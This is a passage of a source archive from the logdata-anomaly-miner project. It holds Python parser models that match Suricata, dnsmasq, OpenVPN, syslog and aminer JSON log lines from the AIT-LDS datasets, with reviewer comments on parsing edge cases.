DecimalIntegerValueModelElement("dcerpc_tcp"), FixedDataModelElement("dns_tcp_str", b',"dns_tcp":'), DecimalIntegerValueModelElement("dns_tcp"), FixedDataModelElement("failed_tcp_str", b',"failed_tcp":'), DecimalIntegerValueModelElement("failed_tcp"), FixedDataModelElement("dcerpc_udp_str", b',"dcerpc_udp":'), DecimalIntegerValueModelElement("dcerpc_udp"), FixedDataModelElement("dns_udp_str", b',"dns_udp":'), DecimalIntegerValueModelElement("dns_udp"), FixedDataModelElement("failed_udp_str", b',"failed_udp":'), DecimalIntegerValueModelElement("failed_udp"), ]), SequenceModelElement("tx", [ FixedDataModelElement("http_str", b'},"tx":{"http":'), DecimalIntegerValueModelElement("http"), FixedDataModelElement("smtp_str", b',"smtp":'), DecimalIntegerValueModelElement("smtp"), FixedDataModelElement("tls_str", b',"tls":'), DecimalIntegerValueModelElement("tls"), 
FixedDataModelElement("dns_tcp_str", b',"dns_tcp":'), DecimalIntegerValueModelElement("dns_tcp"), FixedDataModelElement("dns_udp_str", b',"dns_udp":'), DecimalIntegerValueModelElement("dns_udp"), ]) ]), SequenceModelElement("flow_mgr", [ FixedDataModelElement("closed_pruned_str", b'}},"flow_mgr":{"closed_pruned":'), DecimalIntegerValueModelElement("closed_pruned"), FixedDataModelElement("new_pruned_str", b',"new_pruned":'), DecimalIntegerValueModelElement("new_pruned"), FixedDataModelElement("est_pruned_str", b',"est_pruned":'), DecimalIntegerValueModelElement("est_pruned"), FixedDataModelElement("bypassed_pruned_str", b',"bypassed_pruned":'), DecimalIntegerValueModelElement("bypassed_pruned"), FixedDataModelElement("flows_checked_str", b',"flows_checked":'), DecimalIntegerValueModelElement("flows_checked"), FixedDataModelElement("flows_notimeout_str", b',"flows_notimeout":'), DecimalIntegerValueModelElement("flows_notimeout"), FixedDataModelElement("flows_timeout_str", b',"flows_timeout":'), DecimalIntegerValueModelElement("flows_timeout"), FixedDataModelElement("flows_timeout_inuse_str", b',"flows_timeout_inuse":'), DecimalIntegerValueModelElement("flows_timeout_inuse"), FixedDataModelElement("flows_removed_str", b',"flows_removed":'), DecimalIntegerValueModelElement("flows_removed"), FixedDataModelElement("rows_checked_str", b',"rows_checked":'), DecimalIntegerValueModelElement("rows_checked"), FixedDataModelElement("rows_skipped_str", b',"rows_skipped":'), DecimalIntegerValueModelElement("rows_skipped"), FixedDataModelElement("rows_empty_str", b',"rows_empty":'), DecimalIntegerValueModelElement("rows_empty"), FixedDataModelElement("rows_busy_str", b',"rows_busy":'), DecimalIntegerValueModelElement("rows_busy"), FixedDataModelElement("rows_maxlen_str", b',"rows_maxlen":'), DecimalIntegerValueModelElement("rows_maxlen"), ]), SequenceModelElement("dns", [ FixedDataModelElement("memuse_str", b'},"dns":{"memuse":'), DecimalIntegerValueModelElement("memuse"), 
FixedDataModelElement("memcap_state_str", b',"memcap_state":'), DecimalIntegerValueModelElement("memcap_state"), FixedDataModelElement("memcap_global_str", b',"memcap_global":'), DecimalIntegerValueModelElement("memcap_global"), ]), SequenceModelElement("http", [ FixedDataModelElement("memuse_str", b'},"http":{"memuse":'), DecimalIntegerValueModelElement("memuse"), FixedDataModelElement("memcap_str", b',"memcap":'), DecimalIntegerValueModelElement("memcap"), ]), FixedDataModelElement("quote_str", b"}}}") ]), SequenceModelElement("tls", [ FixedDataModelElement("tls_str", b'tls",'), conn, SequenceModelElement("tls", [ FixedDataModelElement("subject_str", b',"tls":{"subject":"'), DelimitedDataModelElement("subject", b'"'), FixedDataModelElement("issuerdn_str", b'","issuerdn":"'), DelimitedDataModelElement("issuerdn", b'"'), FixedDataModelElement("fingerprint_str", b'","fingerprint":"'), DelimitedDataModelElement("fingerprint", b'"'), OptionalMatchModelElement( "sni", SequenceModelElement("sni", [ FixedDataModelElement("sni_str", b'","sni":"'), DelimitedDataModelElement("sni", b'"'), ]) ), FixedDataModelElement("version_str", b'","version":"'), DelimitedDataModelElement("version", b'"'), FixedDataModelElement("notbefore_str", b'","notbefore":"'), DelimitedDataModelElement("notbefore", b'"'), FixedDataModelElement("notafter_str", b'","notafter":"'), DelimitedDataModelElement("notafter", b'"'), ]), FixedDataModelElement("brack_str", b'"}}') ]), SequenceModelElement("alert", [ FixedDataModelElement("alert_str", b'alert",'), conn, OptionalMatchModelElement( "tx_id", SequenceModelElement("tx_id", [ FixedDataModelElement("tx_id", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), ])), SequenceModelElement("alert", [ FixedDataModelElement("action_str", b',"alert":{"action":"'), DelimitedDataModelElement("action", b'"'), FixedDataModelElement("gid_str", b'","gid":'), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("signature_id_str", b',"signature_id":'), 
DecimalIntegerValueModelElement("signature_id"),
                    FixedDataModelElement("rev_str", b',"rev":'),
                    DecimalIntegerValueModelElement("rev"),
                    FixedDataModelElement("signature_str", b',"signature":"'),
                    DelimitedDataModelElement("signature", b'"'),
                    FixedDataModelElement("category_str", b'","category":"'),
                    DelimitedDataModelElement("category", b'"'),
                    FixedDataModelElement("severity_str", b'","severity":'),
                    DecimalIntegerValueModelElement("severity"),
                    FixedDataModelElement("brack_str", b"}")
                ]),
                http,
                FixedDataModelElement("brack_str", b"}")
            ]),
        ])
    ])
    return model
SuricataFastParsingModel.py000066400000000000000000000035341500476301700336140ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds
"""This module defines a generated parser model."""
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement


def get_model():
    """Return a model to parse Suricata Fast logs from the AIT-LDS.

    One fast.log line is expected as
    ``<time> [**] [<id1>:<id2>:<id3>] <message> [**] [Classification: <classification>] [Priority: <priority>] {<conn>} <src_ip>:<src_port> -> <dst_ip>:<dst_port>``
    where id1:id2:id3 is presumably the gid:sid:rev triple of the rule that fired.

    :return: the root SequenceModelElement of the parser tree.
    """
    model = SequenceModelElement("model", [
        DateTimeModelElement("time", b"%m/%d/%Y-%H:%M:%S.%f"),
        FixedDataModelElement("brack_str1", b" [**] ["),
        DecimalIntegerValueModelElement("id1"),
        FixedDataModelElement("sep1", b":"),
        DecimalIntegerValueModelElement("id2"),
        FixedDataModelElement("sep2", b":"),
        DecimalIntegerValueModelElement("id3"),
        FixedDataModelElement("sep3", b"] "),
        # Delimited elements stop in front of their delimiter without consuming
        # it, which is why the fixed elements below repeat " [**] ", "]" and "}".
        # A rule message that itself contains " [**] " would be cut short here.
        DelimitedDataModelElement("message", b" [**] "),
        FixedDataModelElement("classification_str", b" [**] [Classification: "),
        DelimitedDataModelElement("classification", b"]"),
        FixedDataModelElement("priority_str", b"] [Priority: "),
        DecimalIntegerValueModelElement("priority"),
        # NOTE(review): "brack_str1" and "colon" are each used twice in this
        # sequence, so two match elements end up under the same path
        # (/model/brack_str1, /model/colon).  Presumably harmless for matching
        # itself, but rename them if a detector ever has to address one of them.
        FixedDataModelElement("brack_str1", b"] {"),
        # Text between the braces -- presumably the transport protocol.
        DelimitedDataModelElement("conn", b"}"),
        FixedDataModelElement("brack_str2", b"} "),
        # NOTE(review): IpAddressDataModelElement is used without ipv6=True
        # (compare OpenVpnParsingModel), so alerts on IPv6 traffic presumably do
        # not parse and would surface only as unparsed atoms -- confirm.
        IpAddressDataModelElement("src_ip"),
        FixedDataModelElement("colon", b":"),
        DecimalIntegerValueModelElement("src_port"),
        FixedDataModelElement("arrow_str", b" -> "),
        IpAddressDataModelElement("dst_ip"),
        FixedDataModelElement("colon", b":"),
        DecimalIntegerValueModelElement("dst_port"),
    ])
    return model
SyslogParsingModelAIT-LDSv1.py000066400000000000000000000004031500476301700337200ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds
"""This module defines a generated parser model."""
import SyslogParsingModel


def get_model():
    """Return a model to parse Syslogs from the AIT-LDS.

    Thin wrapper around SyslogParsingModel.get_model(): the start year of the
    model's first child is pinned to 2020, presumably because the syslog
    timestamp format carries no year and the AIT-LDS v1 data stems from 2020.
    Assumes children[0] is the DateTimeModelElement of that model -- confirm
    against SyslogParsingModel before reordering its elements.

    :return: the SyslogParsingModel tree with start_year set to 2020.
    """
    model = SyslogParsingModel.get_model()
    model.children[0].start_year = 2020
    return model
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds2/000077500000000000000000000000001500476301700265005ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds2/DnsParsingModel.py000066400000000000000000000112521500476301700321040ustar00rootroot00000000000000
"""This module defines a generated parser model."""
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DecimalFloatValueModelElement import
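DecimalFloatValueModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement


def get_model():
    """Return a model to parse dnsmasq syslog lines from the AIT-LDS2.

    Every line starts with a syslog timestamp, the service name and the pid in
    square brackets; the remainder is dispatched through the
    FirstMatchModelElement "type" over the dnsmasq message variants present in
    the dataset: queries, replies, forwards, cached answers, upstream
    nameserver notices and a few fixed start-up / shutdown messages.

    Compared with the generated version, the query record type accepts any
    run of upper-case letters (so NS, SOA, CNAME and ANY queries are parsed
    instead of being reported as unparsed) and the "read /etc/hosts" notice
    accepts any address count instead of exactly 7.  Both changes are strict
    supersets of the old behaviour: every line that matched before still does.

    :return: the root SequenceModelElement of the parser tree.
    """
    # Bytes accepted in a reply / cached answer value: every printable ASCII
    # character except the space.  Presumably deliberately wider than an IP
    # address because dnsmasq logs names and placeholder values there as well.
    alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]"
    model = SequenceModelElement("model", [
        # Syslog preamble "<Mon> <day> <HH:MM:SS> <service>[<pid>]: ".  The
        # timestamp carries no year, hence the fixed start_year.
        DateTimeModelElement("time", b"%b %d %H:%M:%S ", start_year=2022),
        DelimitedDataModelElement("service", b"["),
        FixedDataModelElement("br_open", b"["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("br_close", b"]: "),
        # Message variants; the first alternative that matches wins.
        FirstMatchModelElement("type", [
            # "query[<type>] <domain> from <ip>"
            SequenceModelElement("query", [
                FixedDataModelElement("query", b"query["),
                # Record type.  Upper-case letters only -- a superset of the
                # generated alphabet b"ATXPRMSV", which could spell A/AAAA/TXT/
                # PTR/MX/SRV but left NS, SOA, CNAME and ANY queries unmatched
                # (no other alternative starts with "query[", so such lines
                # failed the whole model).  "]" is not in the alphabet, so the
                # following fixed element still terminates the match.
                VariableByteDataModelElement("record", b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"),
                FixedDataModelElement("br_close", b"] "),
                DelimitedDataModelElement("domain", b" "),
                FixedDataModelElement("from", b" from "),
                IpAddressDataModelElement("ip")
            ]),
            # "reply <domain> is <value>" -- the value is not necessarily an IP.
            SequenceModelElement("reply", [
                FixedDataModelElement("reply", b"reply "),
                DelimitedDataModelElement("domain", b" "),
                FixedDataModelElement("is", b" is "),
                VariableByteDataModelElement("ip", alphabet)
            ]),
            # "forwarded <domain> to <upstream ip>" (the first element id
            # "reply" is inherited from the generator; the path is
            # /model/type/forwarded/reply).
            SequenceModelElement("forwarded", [
                FixedDataModelElement("reply", b"forwarded "),
                DelimitedDataModelElement("domain", b" "),
                FixedDataModelElement("to", b" to "),
                IpAddressDataModelElement("ip")
            ]),
            # NOTE(review): the next two sequences share the id "nameserver", so
            # both report under /model/type/nameserver; rename one if a detector
            # has to tell them apart.
            SequenceModelElement("nameserver", [
                FixedDataModelElement("nameserver", b"nameserver "),
                IpAddressDataModelElement("ip"),
                FixedDataModelElement("refused", b" refused to do a recursive query"),
            ]),
            SequenceModelElement("nameserver", [
                FixedDataModelElement("nameserver", b"using nameserver "),
                IpAddressDataModelElement("ip"),
                FixedDataModelElement("port", b"#53"),
                OptionalMatchModelElement("opt_domain", SequenceModelElement("for_domain", [
                    FixedDataModelElement("for_domain", b" for domain "),
                    AnyByteDataModelElement("domain")
                ]))
            ]),
            # "cached <domain> is <value>" -- same value alphabet as "reply".
            SequenceModelElement("cached", [
                FixedDataModelElement("cached", b"cached "),
                DelimitedDataModelElement("domain", b" "),
                FixedDataModelElement("is", b" is "),
                VariableByteDataModelElement("ip", alphabet)
            ]),
            SequenceModelElement("reducing", [
                FixedDataModelElement("reducing", b"reducing DNS packet size for nameserver "),
                IpAddressDataModelElement("ip"),
                FixedDataModelElement("is", b" to "),
                DecimalIntegerValueModelElement("size")
            ]),
            SequenceModelElement("compile_time_options", [
                FixedDataModelElement("compile_time_options", b"compile time options: "),
                AnyByteDataModelElement("options")
            ]),
            SequenceModelElement("version", [
                FixedDataModelElement("version", b"started, version "),
                DecimalFloatValueModelElement("version_nr"),
                FixedDataModelElement("cachesize", b" cachesize "),
                DecimalIntegerValueModelElement("size")
            ]),
            # "read /etc/hosts - <n> addresses".  The generated model accepted
            # only n == 7 (presumably the count in the training data); any count
            # is accepted now, so the old lines still match.
            SequenceModelElement("read_hosts", [
                FixedDataModelElement("read_hosts_str", b"read /etc/hosts - "),
                DecimalIntegerValueModelElement("addresses"),
                FixedDataModelElement("addresses_str", b" addresses")
            ]),
            FixedDataModelElement("failed_access", b"failed to access /etc/dnsmasq.d/dnsmasq-resolv.conf: No such file or directory"),
            # NOTE(review): this fixed element ends with a space and nothing
            # follows it, so it presumably only matches a line ending in "is ".
            # If the dataset logs a value after "is", add an element for it.
            FixedDataModelElement("version.bind", b"config version.bind is "),
            FixedDataModelElement("sigterm", b"exiting on receipt of SIGTERM"),
        ])
    ])
    return model
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds2/OpenVpnParsingModel.py000066400000000000000000000271131500476301700327500ustar00rootroot00000000000000
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from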
aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement
from aminer.parsing.HexStringModelElement import HexStringModelElement


def get_model():
    """Return a model to parse OpenVPN logs from the AIT-LDS2.

    Every line starts with "<YYYY-mm-dd HH:MM:SS> [<user>/]<ip>:<port>"; the
    remainder is dispatched through the FirstMatchModelElement "fm" over the
    message kinds present in the dataset (peer info, certificate verification,
    TLS session events and errors, MULTI/MULTI_sva address assignment,
    per-client activity, PUSH and signal messages).

    :return: the root SequenceModelElement of the parser tree.
    """
    model = SequenceModelElement("model", [
        DateTimeModelElement("datetime", b"%Y-%m-%d %H:%M:%S "),
        # Optional "<user>/" prefix in front of the peer address.  The delimited
        # element scans to the first "/" in the line; if that "/" belongs to a
        # later part of the message the address check after it fails and the
        # optional match is skipped, which keeps user-less lines parseable.
        OptionalMatchModelElement("user", SequenceModelElement("user", [
            DelimitedDataModelElement("user", b"/"),
            FixedDataModelElement("slash", b"/")
        ])),
        IpAddressDataModelElement("ip"),
        FixedDataModelElement("colon", b":"),
        DecimalIntegerValueModelElement("port"),
        FirstMatchModelElement("fm", [
            # " peer info: IV_<KEY>=<value>" -- one key per line.
            SequenceModelElement("peer_info", [
                FixedDataModelElement("peer_info_str", b" peer info: IV_"),
                FirstMatchModelElement("fm", [
                    SequenceModelElement("version", [
                        FixedDataModelElement("version_str", b"VER="),
                        AnyByteDataModelElement("version")
                    ]),
                    SequenceModelElement("platform", [
                        FixedDataModelElement("platform_str", b"PLAT="),
                        AnyByteDataModelElement("platform")
                    ]),
                    SequenceModelElement("protocol", [
                        FixedDataModelElement("protocol_str", b"PROTO="),
                        DecimalIntegerValueModelElement("protocol")
                    ]),
                    SequenceModelElement("lz", [
                        FixedWordlistDataModelElement("lz_str", [b"LZ4=", b"LZ4v2=", b"LZO="]),
                        DecimalIntegerValueModelElement("lz")
                    ]),
                    SequenceModelElement("comp_stub", [
                        FixedWordlistDataModelElement("comp_stub_str", [b"COMP_STUB=", b"COMP_STUBv2="]),
                        # NOTE(review): the value id "protocol" looks like a
                        # copy-paste from the PROTO branch; its path is
                        # /model/fm/peer_info/fm/comp_stub/protocol.
                        DecimalIntegerValueModelElement("protocol")
                    ]),
                    SequenceModelElement("tcpnl", [
                        FixedDataModelElement("tcpnl_str", b"TCPNL="),
                        DecimalIntegerValueModelElement("tcpnl")
                    ]),
                    SequenceModelElement("ncp", [
                        FixedDataModelElement("ncp_str", b"NCP="),
                        DecimalIntegerValueModelElement("ncp")
                    ]),
                ])
            ]),
            FixedDataModelElement("validating", b" Validating certificate extended key usage"),
            SequenceModelElement("communication", [
                FixedWordlistDataModelElement("direction", [b" Outgoing Data", b" Incoming Data", b" Control"]),
                FixedDataModelElement("data_channel_str", b" Channel: "),
                AnyByteDataModelElement("msg")
            ]),
            # " VERIFY KU OK" / " VERIFY EKU OK".
            SequenceModelElement("verify", [
                FixedDataModelElement("verify_str", b" VERIFY "),
                FixedWordlistDataModelElement("type", [b"KU", b"EKU"]),
                FixedDataModelElement("ok_str", b" OK")
            ]),
            # " VERIFY OK: depth=<n>, C=.., ST=.., L=.., O=.., CN=.., emailAddress=..".
            # NOTE(review): this and the previous sequence both use the id
            # "verify", so they share the path /model/fm/verify.
            SequenceModelElement("verify", [
                FixedDataModelElement("verify_str", b" VERIFY OK: "),
                RepeatedElementDataModelElement("cert_data", SequenceModelElement("seq", [
                    # "CN" is listed before its prefix "C" -- presumably so the
                    # longer word is tried first; confirm the matching order of
                    # FixedWordlistDataModelElement before reordering.
                    FixedWordlistDataModelElement("attribute", [b"depth", b"ST", b"L", b"O", b"CN", b"C", b"emailAddress"]),
                    FixedDataModelElement("equals_sign", b"="),
                    # Attribute values are cut at the next ","; the final one
                    # takes the rest of the line.  A DN value that itself
                    # contains ", " (e.g. an O= with a comma) would therefore
                    # be split and the repetition would stop early.
                    FirstMatchModelElement("fm", [
                        SequenceModelElement("data", [
                            DelimitedDataModelElement("data", b","),
                            FixedDataModelElement("sp", b", ")
                        ]),
                        AnyByteDataModelElement("data")
                    ]),
                ]))
            ]),
            SequenceModelElement("tls", [
                FixedDataModelElement("tls_str", b" TLS: "),
                FirstMatchModelElement("fm", [
                    # "soft reset sec=<a>/<b> bytes=<a>/<b> pkts=<a>/<b>"; the
                    # second bytes value may carry a sign.
                    SequenceModelElement("soft_reset", [
                        FixedDataModelElement("soft_reset_str", b"soft reset sec="),
                        DecimalIntegerValueModelElement("sec"),
                        FixedDataModelElement("slash", b"/"),
                        DecimalIntegerValueModelElement("sec"),
                        FixedDataModelElement("bytes_str", b" bytes="),
                        DecimalIntegerValueModelElement("bytes"),
                        FixedDataModelElement("slash", b"/"),
                        DecimalIntegerValueModelElement("bytes", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL),
                        FixedDataModelElement("pkts_str", b" pkts="),
                        DecimalIntegerValueModelElement("pkts"),
                        FixedDataModelElement("slash", b"/"),
                        DecimalIntegerValueModelElement("pkts")
                    ]),
                    # NOTE(review): only the IPv4 "[AF_INET]" form is modelled;
                    # "[AF_INET6]" peers presumably end up unparsed.
                    SequenceModelElement("initial_packet", [
                        FixedDataModelElement("initial_packet_str", b"Initial packet from [AF_INET]"),
                        IpAddressDataModelElement("from_ip"),
                        FixedDataModelElement("colon", b":"),
                        DecimalIntegerValueModelElement("port"),
                        FixedDataModelElement("sid_str", b", sid="),
                        HexStringModelElement("sid1"),
                        FixedDataModelElement("sp", b" "),
                        HexStringModelElement("sid2")
                    ]),
                    SequenceModelElement("move_session", [
                        FixedDataModelElement("move_session_str", b"move_session: dest="),
                        DelimitedDataModelElement("dest", b" "),
                        FixedDataModelElement("src_str", b" src="),
                        DelimitedDataModelElement("src", b" "),
                        FixedDataModelElement("reinit_src_str", b" reinit_src="),
                        DecimalIntegerValueModelElement("reinit_src")
                    ])
                ])
            ]),
            # NOTE(review): the fixed "60 seconds" is presumably a configured
            # timeout (OpenVPN's --hand-window); a server with another setting
            # logs a different number and the line falls out of this model.
            SequenceModelElement("tls_error", [
                FixedDataModelElement("error_str", b" TLS Error: "),
                FirstMatchModelElement("fm", [
                    FixedDataModelElement("negotiation_failed", b"TLS key negotiation failed to occur within 60 seconds (check your network connectivity)"),
                    FixedDataModelElement("handshake_failed", b"TLS handshake failed")
                ])
            ]),
            SequenceModelElement("multi", [
                FixedDataModelElement("multi_str", b" MULTI: "),
                FirstMatchModelElement("fm", [
                    # "Learn: <ip1> -> <name>/<ip2>:<port>"
                    SequenceModelElement("learn", [
                        FixedDataModelElement("learn_str", b"Learn: "),
                        IpAddressDataModelElement("ip1"),
                        FixedDataModelElement("arrow", b" -> "),
                        DelimitedDataModelElement("name", b"/"),
                        FixedDataModelElement("slash", b"/"),
                        IpAddressDataModelElement("ip2"),
                        FixedDataModelElement("colon", b":"),
                        DecimalIntegerValueModelElement("port")
                    ]),
                    # "primary virtual IP for <name>/<ip1>:<port>: <ip2>"
                    SequenceModelElement("primary", [
                        FixedDataModelElement("primary_str", b"primary virtual IP for "),
                        DelimitedDataModelElement("name", b"/"),
                        FixedDataModelElement("slash", b"/"),
                        IpAddressDataModelElement("ip1"),
                        FixedDataModelElement("colon", b":"),
                        DecimalIntegerValueModelElement("port"),
                        FixedDataModelElement("colon", b": "),
                        IpAddressDataModelElement("ip2")
                    ]),
                ])
            ]),
            SequenceModelElement("multi_sva", [
                FixedDataModelElement("multi_str", b" MULTI_sva: "),
                FirstMatchModelElement("fm", [
                    SequenceModelElement("pool_returned", [
                        FixedDataModelElement("pool_returned_str", b"pool returned IPv4="),
                        IpAddressDataModelElement("ip"),
                        FixedDataModelElement("ipv6_str", b", IPv6="),
                        FirstMatchModelElement("fm", [
                            FixedDataModelElement("not_enabled", b"(Not enabled)"),
                            IpAddressDataModelElement("ipv6", ipv6=True)
                        ])
                    ]),
                    # Same layout as the MULTI "primary" message above.
                    SequenceModelElement("primary", [
                        FixedDataModelElement("primary_str", b"primary virtual IP for "),
                        DelimitedDataModelElement("name", b"/"),
                        FixedDataModelElement("slash", b"/"),
                        IpAddressDataModelElement("ip1"),
                        FixedDataModelElement("colon", b":"),
                        DecimalIntegerValueModelElement("port"),
                        FixedDataModelElement("colon", b": "),
                        IpAddressDataModelElement("ip2")
                    ]),
                ])
            ]),
            # " [<name>] <event>" -- per-client messages.
            SequenceModelElement("activity", [
                FixedDataModelElement("open_bracket", b" ["),
                DelimitedDataModelElement("name", b"]"),
                FixedDataModelElement("close_bracket", b"] "),
                FirstMatchModelElement("fm", [
                    FixedDataModelElement("inactivity_timeout", b"Inactivity timeout (--ping-restart), restarting"),
                    SequenceModelElement("peer_conn_initiated", [
                        FixedDataModelElement("peer_conn_initiated_str", b"Peer Connection Initiated with [AF_INET]"),
                        IpAddressDataModelElement("ip"),
                        FixedDataModelElement("colon", b":"),
                        DecimalIntegerValueModelElement("port")
                    ]),
                ])
            ]),
            SequenceModelElement("sent_control", [
                FixedDataModelElement("sent_control_str", b" SENT CONTROL ["),
                DelimitedDataModelElement("name", b"]"),
                FixedDataModelElement("bracket", b"]: "),
                AnyByteDataModelElement("msg")
            ]),
            FixedDataModelElement("client_auth_expected", b" ++ Certificate has EKU (str) TLS Web Client Authentication, expects TLS Web Client Authentication"),
            FixedDataModelElement("push", b" PUSH: Received control message: 'PUSH_REQUEST'"),
            FixedDataModelElement("SIGUSR1", b" SIGUSR1[soft,ping-restart] received, client-instance restarting")
        ])
    ])
    return model
SyslogParsingModelAIT-LDSv2.py000066400000000000000000000004031500476301700340030ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds2
"""This module defines a generated parser model."""
import SyslogParsingModel


def get_model():
    """Return a model to parse Syslogs from the AIT-LDS2.

    Thin wrapper around SyslogParsingModel.get_model(): the start year of the
    model's first child is pinned to 2022, presumably because the syslog
    timestamp format carries no year and the AIT-LDS2 data stems from 2022.
    Assumes children[0] is the DateTimeModelElement of that model -- confirm
    against SyslogParsingModel before reordering its elements.

    :return: the SyslogParsingModel tree with start_year set to 2022.
    """
    model = SyslogParsingModel.get_model()
    model.children[0].start_year = 2022
    return model
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/000077500000000000000000000000001500476301700264755ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/AminerParsingModel.py000066400000000000000000000244551500476301700326010ustar00rootroot00000000000000
"""This module defines a parser for the aminer."""
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
from aminer.parsing.JsonModelElement import JsonModelElement
from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement


def get_model():
    """Return the model.

    Parser for the aminer's own JSON anomaly output, so that one aminer
    instance can consume the reports of another.  The tree mirrors the keys of
    that output (AnalysisComponent, LogData, RuleInfo, StatusInfo, ...).

    Conventions used here (verify against JsonModelElement before relying on
    them): the trailing "_" argument is presumably the prefix that marks
    optional keys, "ALLOW_ALL_KEYS" / "ALLOW_ALL" presumably accept arbitrary
    keys or whole subtrees, and "EMPTY_ARRAY" an empty list.  The wildcard
    subtrees (_ParsedLogAtom, _TypeInfo, _StatusInfo keys) are therefore not
    validated beyond their leaf types -- keep that in mind when the input file
    is not produced by a trusted aminer instance.

    :return: the JsonModelElement "aminer".
    """
    # Letters only -- used for component type names and rule types.
    name_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    # Printable ASCII plus a few Latin-1 characters and "\n"; encoded as UTF-8.
    alphabet = "!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[] °§ß–\n".encode()
    # NOTE(review): alphabet already ends with "\n", so this only duplicates
    # the newline byte; harmless, but the two alphabets are effectively equal.
    alphabet_with_newline = alphabet + b"\n"
    # Characters allowed in file names and parser paths (space included).
    filename_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 ._-/"
    # Shared instances: the same element object is placed at several positions
    # of the tree below.
    path = VariableByteDataModelElement("path", filename_alphabet)
    apostrophe = FixedDataModelElement("apostrophe", b"'")
    # "'<path>'[,'<path>'...]"
    repeated_path = RepeatedElementDataModelElement("repeated", SequenceModelElement("sequence", [
        apostrophe,
        path,
        apostrophe,
        OptionalMatchModelElement("optional", FixedDataModelElement("comma", b","))
    ]))
    # "('a','b')->('c')" or "('a')<-('b')" -- presumably how correlation
    # rules are printed in the RuleInfo section.
    rule = SequenceModelElement("rule", [
        FixedDataModelElement("open_bracket", b"("),
        repeated_path,
        FixedWordlistDataModelElement("close_bracket", [b")->(", b")<-("]),
        repeated_path,
        FixedDataModelElement("close_bracket", b")")
    ])
    # "<actual>/<expected>" counters.
    expected = SequenceModelElement("expected", [
        DecimalIntegerValueModelElement("actual"),
        FixedDataModelElement("slash", b"/"),
        DecimalIntegerValueModelElement("expected")
    ])
    observed = SequenceModelElement("observed", [
        DecimalIntegerValueModelElement("actual"),
        FixedDataModelElement("slash", b"/"),
        DecimalIntegerValueModelElement("expected")
    ])
    has_outlier_bins_flag = FixedWordlistDataModelElement("has_outlier_bins_flag", [b"true", b"false"])
    model = JsonModelElement("aminer", {
        "_AnalysisComponent": {
            # Either an integer id or the JSON literal null.
            "AnalysisComponentIdentifier": FirstMatchModelElement("first", [
                DecimalIntegerValueModelElement("component_id"),
                FixedDataModelElement("null", b"null")
            ]),
            "AnalysisComponentType": VariableByteDataModelElement("component_type", name_alphabet),
            "AnalysisComponentName": VariableByteDataModelElement("component_name", alphabet),
            "Message": VariableByteDataModelElement("message", alphabet),
            "_PersistenceFileName": VariableByteDataModelElement("persistence_file_name", filename_alphabet),
            "_TrainingMode": FixedWordlistDataModelElement("training_mode", [b"true", b"false"]),
            "_AffectedLogAtomPaths": [VariableByteDataModelElement("affected_log_atom_paths", alphabet)],
